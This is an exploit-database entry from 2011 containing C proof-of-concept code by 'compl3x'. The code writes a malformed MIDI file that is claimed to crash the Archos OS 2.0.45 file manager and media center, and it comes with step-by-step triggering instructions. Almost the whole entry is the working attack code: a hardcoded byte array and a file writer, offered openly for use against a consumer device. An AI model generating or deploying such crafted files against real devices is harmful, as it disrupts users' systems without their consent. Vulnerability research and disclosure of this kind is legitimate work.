Archos OS 2.0.45 File Manager MIDI Denial Of Service Exploit

2011-07-27T00:00:00
ID 1337DAY-ID-16568
Type zdt
Reporter compl3x
Modified 2011-07-27T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            #include <stdio.h>

using namespace std;
/*
----------------------------------------------------------------
                                       888  .d8888b.
                                       888 d88P  Y88b
                                       888      .d88P
 .d8888b .d88b.  88888b.d88b.  88888b.  888     8888"  888  888
d88P"   d88""88b 888 "888 "88b 888 "88b 888      "Y8b. `Y8bd8P'
888     888  888 888  888  888 888  888 888 888    888   X88K
Y88b.   Y88..88P 888  888  888 888 d88P 888 Y88b  d88P .d8""8b.
 "Y8888P "Y88P"  888  888  888 88888P"  888  "Y8888P"  888  888
                              888
                              888
                              888
-----------------------------------------------------------------
Title: Archos OS 2.0.45 File Manager MIDI Denial Of Service Exploit
Author: compl3x
Site: compl3x.wordpress.com
Contact: [email protected]
Twitter: @Complex360
Versions Affected: All (<= 2.0.45)
----------------------------------------------------------------------------------
Oh Archos, Y U NO LIKE MY MIDI?
Copy file to any folder, open it, choose to open with Archos Media
Center
click "ok" on prompt and then press the home button
Also, to Archos: 3 VULNS = 0.0.0.3 added to version, 2.0.4.8. MAKE IT
HAPPEN.
----------------------------------------------------------------------------------
*/


int main(int argc, char **argv)
{
   unsigned char data[] =
   {
   0x4D, 0x54, 0x68, 0x64, 0x00, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00,
0x0B, 0x01, 0x80, 0x4D,
       0x54, 0x72, 0x6B, 0x00, 0x00, 0x00, 0x23, 0x00, 0xFF, 0x58,
0x04, 0x04, 0x02, 0x60, 0x08,
       0x00, 0xFF, 0x7F, 0x03, 0x00, 0x00, 0x41, 0x00, 0xFF, 0x7F,
0x05, 0x00, 0x00, 0x77, 0x0E,
       0x00, 0x00, 0xFF, 0x51, 0x03, 0x07, 0x27, 0x0E, 0x00, 0xFF,
0x2F, 0x00, 0x4D, 0x54, 0x72,
       0x6B, 0x00, 0x00, 0x06, 0xD7, 0x00, 0xB0, 0x00, 0x00, 0x00,
0xC0, 0x00, 0x00, 0xB0, 0x07,
       0x7F, 0x00, 0xFF, 0x59, 0x02, 0x00, 0x00, 0x00, 0x90, 0x4E,
0x64, 0x84, 0x40, 0x80, 0x4E,
       0x00, 0x00, 0x90, 0x4C, 0x64, 0x84, 0x40, 0x80, 0x4C, 0x00,
0x00, 0x90, 0x53, 0x42, 0x42,
       0xFE, 0xFE, 0xFF
   } ;

   printf("\n[+] Archos OS 2.0.45 File Manager MIDI Denial Of Service
Exploit by Complex <<[email protected]>>");

   if(argc != 2)
   {
       printf("[+] Usage: %s <filename.mid>\n", argv[0]);
       return 0;
   }

   FILE* pFile;
   pFile = fopen(argv[1], "wb");
   if(pFile == NULL)
   {
       printf("[-] Error creating file");
       return 0;
   }

   fwrite(data, 1, sizeof(data), pFile);

   printf("[+] File: \"%s\"\n", argv[1]);
   printf("[+] Written %d bytes\n", sizeof(data));

   fclose(pFile);

   return 0;
}



#  0day.today [2018-01-04]  #